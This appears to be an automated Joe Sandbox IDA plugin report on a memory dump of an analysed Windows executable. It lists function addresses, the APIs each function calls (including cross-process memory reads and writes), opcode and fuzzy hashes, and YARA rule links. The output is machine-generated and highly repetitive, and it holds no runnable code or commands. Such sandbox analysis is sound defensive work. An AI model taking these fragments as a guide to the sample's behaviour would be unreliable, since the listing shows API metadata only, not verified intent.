Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e8322f9027e2f3506134f91eaf24a374f248e501971dda1151118aa96f31d1a2
Instruction ID: a2f3effb28ca16cc6f1a38a921c17ffb48ea79bce7ecbf2a8e92d6a53cfa1cf8
Opcode Fuzzy Hash: e8322f9027e2f3506134f91eaf24a374f248e501971dda1151118aa96f31d1a2
Instruction Fuzzy Hash: 02218435A00508AFD714EFA5DC84A6AB7E5EF88311F148579F90997752CA71ED01CB90

Function 009812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
SelectObject.GDI32(?,00000000), ref: 0098135C
BeginPath.GDI32(?), ref: 00981373
SelectObject.GDI32(?,00000000), ref: 0098139C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2eb482f20ed89aac907613fccf986ba23e031e25d64f7d9a87321acef6dbc90a
Instruction ID: 9492b4bf98e87e9d207ba4156e81688f9d7a1756688b074d339b3aee3bcf9a35
Opcode Fuzzy Hash: 2eb482f20ed89aac907613fccf986ba23e031e25d64f7d9a87321acef6dbc90a
Instruction Fuzzy Hash: B5213038C00608EFDB11EFA5ED44B697BACFB51321F144216F814A66B1DB729993EF90

Function 009DBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 009DBCB3
_memcmp.LIBCMT ref: 009DBCD1
_memcmp.LIBCMT ref: 009DBCE4
_memcmp.LIBCMT ref: 009DBCFC
_memcmp.LIBCMT ref: 009DBD14

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 7fe28f017ed25110522c4ad771fce155eba64ba3f9ca41131ade6d674e8ea724
Instruction ID: f37abe18845dcfb1057779bfd433b57297ac6738f8d223be42b2be37ddb754cf
Opcode Fuzzy Hash: 7fe28f017ed25110522c4ad771fce155eba64ba3f9ca41131ade6d674e8ea724
Instruction Fuzzy Hash: 8E01B5B1684205BBD2046A399D42FFBB35CFF55388F058423FE0596342EB60DE2083E4

Function 009E4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009E4ABA
__beginthreadex.LIBCMT ref: 009E4AD8
MessageBoxW.USER32(?,?,?,?), ref: 009E4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009E4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009E4B0A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: c2037b5eab744ab8f1eca45a367922ac430ab9cd595f23909d9dabcca4a05e11
Instruction ID: 7c0bc79dc18d36db72f1461a3b0bed7032e2a165c2e0ff713b8e1c73b3b3b7b9
Opcode Fuzzy Hash: c2037b5eab744ab8f1eca45a367922ac430ab9cd595f23909d9dabcca4a05e11
Instruction Fuzzy Hash: A011E57AD04248BFC711DFF9AC08ADE7BACAB85321F144266F914D3251D6B18D0687A0

Function 009D8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D821E
GetLastError.KERNEL32(?,009D7CE2,?,?,?), ref: 009D8228
GetProcessHeap.KERNEL32(00000008,?,?,009D7CE2,?,?,?), ref: 009D8237
HeapAlloc.KERNEL32(00000000,?,009D7CE2,?,?,?), ref: 009D823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D8255

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
Instruction ID: 9eac807741d5914e675dd9100a72d6ee8931a673c1c92dbfee6d179ff8801c5f
Opcode Fuzzy Hash: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
Instruction Fuzzy Hash: B80186B1240208FFDB208FA5DC89D677F7CEF89794B504569F919D3220DB319C02CA60

Function 009D710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?,?,009D7455), ref: 009D7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?), ref: 009D7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D716C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
Instruction ID: 5495435268a0bd6cbd9e859ccedf7ff8466dc5fd3e9c311dd873ebb2e6922016
Opcode Fuzzy Hash: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
Instruction Fuzzy Hash: 48018476605218BFDB218FA4DC44BAABBBDEF44791F148165FD04E2310E731DD4297A0

Function 009E5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 71b8e97021fb4fdbc2f7cb54cb858cb67941cee716a99ba9f4cc186dd920a3cc
Instruction ID: 25d00fd2f90f01970815ea24645a6966bbee3f43147f9e676d4e4ddb652f6dd4
Opcode Fuzzy Hash: 71b8e97021fb4fdbc2f7cb54cb858cb67941cee716a99ba9f4cc186dd920a3cc
Instruction Fuzzy Hash: 37016931D01A1DDBCF10EFE5E888AEDBB78FB0C315F420566EA55B2240CB3099528BA1

Function 009D810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8157

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
Instruction ID: 611b6cfafa28bae27eff5cf7232e5b365c51448c45f1c131cb0523f9d8aeb479
Opcode Fuzzy Hash: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
Instruction Fuzzy Hash: C5F0C2B0244318AFEB214FA4EC89F673BACFF49794B004036FA45D6250DB609C07DA60

Function 009DC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009DC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 009DC20E
MessageBeep.USER32(00000000), ref: 009DC226
KillTimer.USER32(?,0000040A), ref: 009DC242
EndDialog.USER32(?,00000001), ref: 009DC25C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 99212f65c00d4d765a203bef66b78e024d4aa43682272834812af35d40d461a3
Instruction ID: 1807dc007294563149f7f0cb06a8819d59a014b062e20667924245f914bbc1a0
Opcode Fuzzy Hash: 99212f65c00d4d765a203bef66b78e024d4aa43682272834812af35d40d461a3
Instruction Fuzzy Hash: 6D01DB70444309ABEB319B90DD4EF96777CFF00705F04466AF652A15E0D7F5A945CB50

Function 009813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009813BF
StrokeAndFillPath.GDI32(?,?,009BB888,00000000,?), ref: 009813DB
SelectObject.GDI32(?,00000000), ref: 009813EE
DeleteObject.GDI32 ref: 00981401
StrokePath.GDI32(?), ref: 0098141C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 663d321aac9e3d0a1c841f5529008f50b38bf4772d9ff48fafb6f78b3f777d59
Instruction ID: 4cbcdbf76a1eb99f85dbe1a798a929288eb2767a21eb3baa78b5d1ef504162cd
Opcode Fuzzy Hash: 663d321aac9e3d0a1c841f5529008f50b38bf4772d9ff48fafb6f78b3f777d59
Instruction Fuzzy Hash: A5F0CD3840460CDFDB25DFB6EC4C7583BA8AB42326F088225E429595F2DB368597EF50

Function 00992CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 00987A51: _memmove.LIBCMT ref: 00987AAB

__swprintf.LIBCMT ref: 00992ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00992D66

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 94239cd0553a7714a7985a6677e5ed66faafa738ae97d12102dccace05182fe9
Instruction ID: acd8e1e9c042f1afe59d9b6f0ae9636934b1441f109d98d907a71a07edd6a179
Opcode Fuzzy Hash: 94239cd0553a7714a7985a6677e5ed66faafa738ae97d12102dccace05182fe9
Instruction Fuzzy Hash: F5913971508301AFCB14FF68C885E6FB7A8EFD6710F14491DF4969B2A1EA21ED44CB92

Function 009EB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770

CoInitialize.OLE32(00000000), ref: 009EB9BB
CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EB9D4
CoUninitialize.OLE32 ref: 009EB9F1

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

Strings

.lnk, xrefs: 009EB99D, 009EB9AB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: d8fb700983b65a4f7f4ac98e1a6249741264930e35c2682309c7529e4260c9bf
Instruction ID: 9f47691cf3cfcf543fd8b9f044d5b0ca90e72dc1ae26eb5a10e9fd2aa46f0c92
Opcode Fuzzy Hash: d8fb700983b65a4f7f4ac98e1a6249741264930e35c2682309c7529e4260c9bf
Instruction Fuzzy Hash: 1FA169756043459FCB10EF15C884E6ABBE5FF89314F188998F8999B3A1CB31EC46CB91

Function 009A501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 009A50AD

Part of subcall function 009B00F0: __87except.LIBCMT ref: 009B012B

Strings

pow, xrefs: 009A5085, 009A50A2

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 15d03cba356f70973839ec0ac31e236d8da54ef63276db93fe4d62afdd541211
Instruction ID: fc31be608aab56beaae448dddb0bbd44dd44286ca0d828d886e3b485448c6211
Opcode Fuzzy Hash: 15d03cba356f70973839ec0ac31e236d8da54ef63276db93fe4d62afdd541211
Instruction Fuzzy Hash: A3515E61B0C60196DB15B718CA053FF3B98DFC2720F218D59E4D9862A9EE38CDC997C6

Function 00996192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00996248
_memmove.LIBCMT ref: 009962E4
_memset.LIBCMT ref: 00996308

Strings

ERCP, xrefs: 009961B3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 871618a6e41eb48fc46eabd6b3d93c9e63d3d2c548333d8f07006e4152bb8d7a
Instruction ID: 4f498367e1884c6d3223724fce17d53bf8faef71091a03f552c9ce653843de7f
Opcode Fuzzy Hash: 871618a6e41eb48fc46eabd6b3d93c9e63d3d2c548333d8f07006e4152bb8d7a
Instruction Fuzzy Hash: DB518171900705DBDF24CF69C9427AAB7E9EF44314F20896EE45ADB291E774AA44CB80

Function 009D97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009E14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009D9296,?,?,00000034,00000800,?,00000034), ref: 009E14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009D983F

Part of subcall function 009E1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009D92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009E14B1

Part of subcall function 009E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 009E1409
Part of subcall function 009E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E1419
Part of subcall function 009E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009D98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009D98F9

Strings

@, xrefs: 009D9911

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c617873a72bd8a01de15469c13911b86f59343ab6e24c05bfc408db01b8229ec
Instruction ID: 1acf338b67b55c643bed17a60b02842c1b549cd43d60d5384c662efda5be55d1
Opcode Fuzzy Hash: c617873a72bd8a01de15469c13911b86f59343ab6e24c05bfc408db01b8229ec
Instruction Fuzzy Hash: 03412E76900118BFDB11EFA4CC45FDEBBB8EB45700F004159F945B7291DA716E45CBA0

Function 00A07946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A0F910,00000000,?,?,?,?), ref: 00A079DF
GetWindowLongW.USER32 ref: 00A079FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A07A0C

Strings

SysTreeView32, xrefs: 00A079B1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 4678739c50e55a57ce460d80b60e273d559ea131104f0dd0990e3f8a359befd4
Instruction ID: e2695eed9bbc9f06051e79fa36df4c2411f4df812e5929a3867765d259e8edb0
Opcode Fuzzy Hash: 4678739c50e55a57ce460d80b60e273d559ea131104f0dd0990e3f8a359befd4
Instruction Fuzzy Hash: 8631AD31A0460AAFDB219F78EC41BEB77A9FB45364F208725F875A32E0D731E9518B50

Function 00A073D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A07461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A07475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A07499

Strings

SysMonthCal32, xrefs: 00A0742C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
